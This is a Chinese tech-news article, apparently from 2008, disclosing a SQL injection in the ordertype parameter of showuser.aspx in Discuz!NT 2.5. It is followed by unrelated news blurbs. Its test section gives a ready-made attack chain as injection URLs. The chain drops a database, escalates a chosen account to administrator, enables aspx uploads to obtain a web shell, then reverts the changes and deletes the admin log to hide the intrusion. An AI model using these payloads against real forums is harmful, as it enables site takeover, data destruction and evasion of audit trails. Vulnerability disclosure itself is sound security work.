首页 > 传媒 > 关键词  > 管理最新资讯  > 正文

Discuz!NT 2.5爆注入漏洞 可获取管理权限

2008-08-29 14:21 · 稿源: 站长之家用户

核心提示:据国内安全组织ISTO近日检测发现,Discuz!NT 2.5出现注入漏洞,利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限,从而控制整个网站。

中国站长站(Chinaz.com)讯:据国内安全组织ISTO近日检测发现,Discuz!NT 2.5出现注入漏洞,利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限,从而控制整个网站。

漏洞说明:Discuz!NT 2.5 是康盛创想(北京)科技有限公司旗下的一款功能强大的基于 ASP.net 平台的社区软件。基于先进的 .Net Framework,默认支持 SQLServer数据库,可扩展支持Access、MySQL等多种数据库,支持IIS5、IIS6、IIS7,安全高效、稳定易用,充分发挥 ASP.net 特性,支持自由选择切换皮肤,支持多种其它论坛的数据转换。

Discuz!NT 2.5 强化论坛功能,提高速度和稳定性,负载能力也有显著改善,在此基础上还将提供包括商品交易、空间、相册等强大功能的插件包,供用户自由选择安装,体现出强大的伸缩扩展性。无论是从功能、性能,还是从支持环境等角度来看,都是目前最为完善和成熟 ASP.net 社区软件。但是ISTO成员在其中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限,从而控制整个网站。

漏洞厂商:https://www.comsenz.com

漏洞解析:在 Discuz!NT 2.5(20080826更新前)版本中showuser.aspx页面由于对ordertype变量没处理好!导致SQL注入,恶意攻击用户甚至不用注册账户,只要精心构造ordertype即可利用此漏洞。

漏洞测试:

https://www.*.com/bbs/showuser.aspx?ordertype=desc;drop database kj;--

https://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid='1',groupid='1' where username='webtets';--//更新为管理员

https://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='aspx' where extension='jpg';-- //更新为aspx可上传

得到SHELL后...

https://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='jpg' where extension='aspx';-- //更新回JPG

https://www.*.com/bbs/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username='webtets';-- //删除日志

https://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid='',groupid='' where username='webtets';--//取消管理员

推广

特别声明:以上内容(如有图片或视频亦包括在内)均为站长传媒平台用户上传并发布,本平台仅提供信息存储服务,对本页面内容所引致的错误、不确或遗漏,概不负任何法律责任,相关信息仅供参考。站长之家将尽力确保所提供信息的准确性及可靠性,但不保证有关资料的准确性及可靠性,读者在使用前请进一步核实,并对任何自主决定的行为负责。任何单位或个人认为本页面内容可能涉嫌侵犯其知识产权或存在不实内容时,可及时向站长之家提出书面权利通知或不实情况说明,并提供身份证明、权属证明及详细侵权或不实情况证明(点击查看反馈联系地址)。本网站在收到上述法律文件后,将会依法依规核实信息,沟通删除相关内容或断开相关链接。

  • 相关推荐
  • 中端之王!一加Ace 5系列卖爆:激活量破200万

    快科技6月30日消息,一加手机市场份额已达3%,1-5月线上渠道累计份额超7.6%。其中Ace系列表现亮眼,激活量达竞品A系列的60%、B系列的130%,成为中端市场主力机型。一加Ace 5系列上市70天激活量突破100万台,其中Ace 5至尊版搭载天玑9400+,跑分达322万创纪录,国补后售价2124.15元;竞速版首发天玑9400e,国补后1529.15元起,是2000元内性能标杆。该系列还包含2299元起的标准版和3399元起的Pro版。

  • 碳企通:OEKO-TEX认证获取亚马逊绿标全指南

    文章主要介绍亚马逊卖家如何通过OEKO-TEX认证获取"气候友好承诺"绿标。关键点包括:1)OEKO-TEX认证能提升产品搜索曝光和转化率,降低合规风险;2)认证分为四类,需根据产品用途选择对应标准;3)详细解析五步认证流程,强调材料清单准备是关键;4)建议通过碳企通等专业机构协助认证,可缩短40%时间;5)获得认证后需在亚马逊卖家中心提交证书,产品将显示环保标识。文章还指出,2023年因化学物质超标下架的中国纺织卖家数量增长35%,而通过认证的产品基本规避了此类风险。

  • 聚焦2025亚马逊云科技中国峰会,合合信息Chaterm革新云资源管理方式

    2025亚马逊云科技中国峰会在上海举行,聚焦云计算与生成式AI融合趋势。会上发布业内首个AI+Agent跨平台云资源智能管理终端Chaterm,通过自然语言交互实现云资源开发运维自动化,将原本需数小时的工作缩短至十几分钟。Chaterm支持"辅助驾驶"和"自动驾驶"两种模式,具备跨平台兼容性,能记忆用户操作习惯实现个性化配置。此外还展出TextIn xParse和TextIn DocFlow两大智能文档处理产品,前者可精准识别复杂文档内容,后者提供文档采集、分类、提取等一站式处理方案。这些创新产品展现了AI技术重塑千行百业的潜力,未来将持续拓展智能应用边界,助力构建更高效的数字化生态。

  • AI新闻网站哪里看?2025年最全AI资讯获取指南

    文章介绍了AI信息过载时代,AIbase.cn作为专业AI资讯平台的优势:1)专业性强,提供技术解读和行业分析;2)时效性高,快速响应重大新闻;3)覆盖全面,包含技术突破、商业应用、投融资等全领域。平台通过精选日报、热点追踪等功能,帮助从业者高效获取有价值信息,适合技术人员、产品经理、投资人等不同群体,是了解AI行业动态的首选渠道。

  • 睿是信息携手Arctera,深化服务中国市场,共筑数据管理新未来

    2025年6月23日,上海睿是信息科技与全球数据管理领导者Arctera达成战略合作。自7月7日起,睿是信息正式成为Arctera中国区独家总代理,全面负责其在中国市场的运营、销售和技术支持服务。Arctera源自Veritas Technologies,在数据合规、弹性和保护领域具有领先优势。睿是信息作为中国领先的IT服务商,将结合Arctera先进的数据管理解决方案,为中国客户提供更高效可靠的服务,助力企业数字化转型。此次合作将深化双方在中国市场的布局,共同推动数据管理技术创新发展。

  • 男子日均点外卖2.5次患病需终身服药 外卖盒在65度以上会释放微塑料

    ​近日,外卖便捷背后暗藏的健康风险引发关注。不久前, 34 岁的程序员李先生突发胸痛前往医院就医,检查结果令人担忧,其血压超标且血管狭窄。经医生诊断,日均2. 5 次的外卖饮食习惯成为导致这一状况的“元凶”。 在经过 3 个月的饮食调整后,李先生体重有所下降,胆固醇指标也降低了,但血管斑块问题依然存在,需要终身服药来控制病情。 不健康的外卖饮食不仅�

  • DigitalOcean 携手 AMD 推出 AMD Instinct MI300X GPU Droplet,加速 AI 创新

    DigitalOcean与AMD达成合作,将推出搭载AMD Instinct MI300X GPU的云服务器,支持AI/ML/HPC工作负载。该GPU具备192GB HBM3内存,能完整加载数十亿参数模型,显著提升训练和推理效率。服务定价每小时1.99美元起,支持1-8个GPU配置,并与Kubernetes无缝集成。未来还将推出MI325X GPU,并面向中国市场提供服务。此次合作旨在为开发者提供经济高效的AI开发解决方案,简化云端GPU部署流程。

  • AI日报:MiniMax推视频生成模型Hailuo 02;Cursor Pro取消500次请求限制;谷歌发布AI模型 Gemini 2.5 Flash-Lite

    本文汇总了AI领域最新动态:1)Cursor Pro取消500次请求限制;2)稀宇科技推出视频生成模型Hailuo02;3)谷歌发布轻量级AI模型Gemini2.5Flash-Lite;4)科大讯飞星火X1升级版7月上线;5)腾讯元宝推出AI编程模式;6)OpenAI将下架GPT-4.5 API;7)苹果Speech API转录速度超Whisper 55%;8)百度推出数字人互动直播间;9)Meta曾试图高薪挖角OpenAI人才;10)Krea1公测开放,解决"AI感"问题;11)特斯拉Grok车载AI助手即将上线;12)谷歌Gemini新增视频分析功能。

  • 安克修改召回方案 充电宝泡盐水处理后可获赔

    安克近期调整了召回执行方案。据社交媒体用户反馈及品牌方确认,针对物流运输受限问题,现允许用户通过盐水浸泡法处理召回产品:将充电宝完全浸入盐水24小时后,上传设备浸泡照片及清晰SN码图片即可完成申报。安克客服解释称,此调整源于部分快递企业暂停接收召回物品,新方案旨在为用户提供更便捷的处理途径。

  • 海尔青岛洗衣机互联工厂获国际BSCI认证

    海尔青岛洗衣机互联工厂近日通过国际BSCI认证审核,在员工权益保障、环境保护等社会责任维度获得A级评价。这是继2021年成为全球家电行业首个"碳中和"工厂后,该工厂在可持续发展领域再获国际认可。BSCI认证由欧洲对外贸易协会发起,是进入国际供应链的重要通行证。此次认证将助力海尔拓展欧盟高端市场,提升国际竞争力。未来工厂将以认证为新起点,深化智能制造能力,为全球用户提供更优质产品体验。